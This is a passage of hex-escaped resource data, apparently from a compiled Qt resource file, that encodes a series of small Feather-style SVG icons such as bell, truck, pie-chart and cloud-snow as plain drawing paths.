\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x41\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x65\x6c\x6c\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x20\x38\x41\
\x36\x20\x36\x20\x30\x20\x30\x20\x30\x20\x36\x20\x38\x63\x30\x20\
\x37\x2d\x33\x20\x39\x2d\x33\x20\x39\x68\x31\x38\x73\x2d\x33\x2d\
\x32\x2d\x33\x2d\x39\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x33\x2e\x37\x33\x20\x32\x31\
\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x33\x2e\x34\x36\x20\
\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x18\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x76\x6f\x6c\x75\x6d\
\x65\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x31\x31\x20\x35\x20\x36\x20\x39\x20\x32\x20\x39\
\x20\x32\x20\x31\x35\x20\x36\x20\x31\x35\x20\x31\x31\x20\x31\x39\
\x20\x31\x31\x20\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x90\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x69\x6e\x73\x74\x61\
\x67\x72\x61\x6d\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x32\
\x22\x20\x79\x3d\x22\x32\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\
\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x30\x22\x20\x72\
\x78\x3d\x22\x35\x22\x20\x72\x79\x3d\x22\x35\x22\x3e\x3c\x2f\x72\
\x65\x63\x74\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x36\
\x20\x31\x31\x2e\x33\x37\x41\x34\x20\x34\x20\x30\x20\x31\x20\x31\
\x20\x31\x32\x2e\x36\x33\x20\x38\x20\x34\x20\x34\x20\x30\x20\x30\
\x20\x31\x20\x31\x36\x20\x31\x31\x2e\x33\x37\x7a\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x37\x2e\x35\x22\x20\x79\x31\x3d\x22\x36\x2e\x35\x22\x20\x78\x32\
\x3d\x22\x31\x37\x2e\x35\x31\x22\x20\x79\x32\x3d\x22\x36\x2e\x35\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x6e\x64\x65\x72\
\x6c\x69\x6e\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x36\x20\x33\x76\x37\x61\x36\x20\x36\x20\x30\x20\x30\x20\x30\x20\
\x36\x20\x36\x20\x36\x20\x36\x20\x30\x20\x30\x20\x30\x20\x36\x2d\
\x36\x56\x33\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x34\x22\x20\x79\x31\x3d\x22\x32\x31\x22\
\x20\x78\x32\x3d\x22\x32\x30\x22\x20\x79\x32\x3d\x22\x32\x31\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x9f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x72\x75\x63\x6b\
\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x31\x22\x20\x79\x3d\
\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x35\x22\x20\x68\
\x65\x69\x67\x68\x74\x3d\x22\x31\x33\x22\x3e\x3c\x2f\x72\x65\x63\
\x74\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x31\x36\x20\x38\x20\x32\x30\x20\x38\x20\x32\x33\x20\
\x31\x31\x20\x32\x33\x20\x31\x36\x20\x31\x36\x20\x31\x36\x20\x31\
\x36\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\
\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x35\x2e\x35\x22\x20\
\x63\x79\x3d\x22\x31\x38\x2e\x35\x22\x20\x72\x3d\x22\x32\x2e\x35\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\
\x6c\x65\x20\x63\x78\x3d\x22\x31\x38\x2e\x35\x22\x20\x63\x79\x3d\
\x22\x31\x38\x2e\x35\x22\x20\x72\x3d\x22\x32\x2e\x35\x22\x3e\x3c\
\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x30\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x6c\x75\x73\x22\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\
\x31\x3d\x22\x35\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\
\x3d\x22\x31\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x35\x22\x20\x79\x31\x3d\x22\x31\x32\
\x22\x20\x78\x32\x3d\x22\x31\x39\x22\x20\x79\x32\x3d\x22\x31\x32\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x69\x65\x2d\x63\
\x68\x61\x72\x74\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x32\x31\x2e\x32\x31\x20\x31\x35\x2e\x38\x39\x41\x31\x30\x20\x31\
\x30\x20\x30\x20\x31\x20\x31\x20\x38\x20\x32\x2e\x38\x33\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x32\x32\x20\x31\x32\x41\x31\x30\x20\x31\x30\x20\x30\x20\x30\
\x20\x30\x20\x31\x32\x20\x32\x76\x31\x30\x7a\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x90\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x65\x66\x72\x65\
\x73\x68\x2d\x63\x63\x77\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x20\x34\x20\x31\x20\
\x31\x30\x20\x37\x20\x31\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x32\x33\x20\x32\x30\x20\x32\x33\x20\x31\
\x34\x20\x31\x37\x20\x31\x34\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x30\
\x2e\x34\x39\x20\x39\x41\x39\x20\x39\x20\x30\x20\x30\x20\x30\x20\
\x35\x2e\x36\x34\x20\x35\x2e\x36\x34\x4c\x31\x20\x31\x30\x6d\x32\
\x32\x20\x34\x6c\x2d\x34\x2e\x36\x34\x20\x34\x2e\x33\x36\x41\x39\
\x20\x39\x20\x30\x20\x30\x20\x31\x20\x33\x2e\x35\x31\x20\x31\x35\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x4d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x75\x6e\x72\x69\
\x73\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x37\
\x20\x31\x38\x61\x35\x20\x35\x20\x30\x20\x30\x20\x30\x2d\x31\x30\
\x20\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x22\x20\
\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x39\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x34\x2e\x32\x32\x22\x20\x79\x31\x3d\x22\x31\x30\x2e\x32\x32\x22\
\x20\x78\x32\x3d\x22\x35\x2e\x36\x34\x22\x20\x79\x32\x3d\x22\x31\
\x31\x2e\x36\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x38\
\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x38\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\x78\x32\
\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x38\x2e\x33\x36\x22\x20\x79\x31\x3d\x22\x31\x31\x2e\x36\x34\x22\
\x20\x78\x32\x3d\x22\x31\x39\x2e\x37\x38\x22\x20\x79\x32\x3d\x22\
\x31\x30\x2e\x32\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x33\x22\x20\x79\x31\x3d\x22\
\x32\x32\x22\x20\x78\x32\x3d\x22\x31\x22\x20\x79\x32\x3d\x22\x32\
\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x38\x20\x36\x20\
\x31\x32\x20\x32\x20\x31\x36\x20\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x3c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6c\x6f\x75\x64\
\x2d\x73\x6e\x6f\x77\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x32\x30\x20\x31\x37\x2e\x35\x38\x41\x35\x20\x35\x20\x30\x20\
\x30\x20\x30\x20\x31\x38\x20\x38\x68\x2d\x31\x2e\x32\x36\x41\x38\
\x20\x38\x20\x30\x20\x31\x20\x30\x20\x34\x20\x31\x36\x2e\x32\x35\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x36\x22\x20\x78\x32\
\x3d\x22\x38\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x31\x36\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x38\x22\x20\x79\x31\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\
\x38\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x32\x30\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\x78\x32\x3d\x22\x31\
\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x32\x32\x22\x20\x78\x32\x3d\x22\x31\
\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x32\x32\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x36\x22\x20\x79\x31\x3d\x22\x31\x36\x22\x20\x78\x32\x3d\x22\x31\
\x36\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x31\x36\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x36\x22\x20\x79\x31\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\x31\
\x36\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x32\x30\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x67\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x6c\x65\x66\x74\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\
\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\
\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\
\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x32\x20\x38\x20\x38\x20\x31\
\x32\x20\x31\x32\x20\x31\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\
\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x38\x22\
\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x98\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
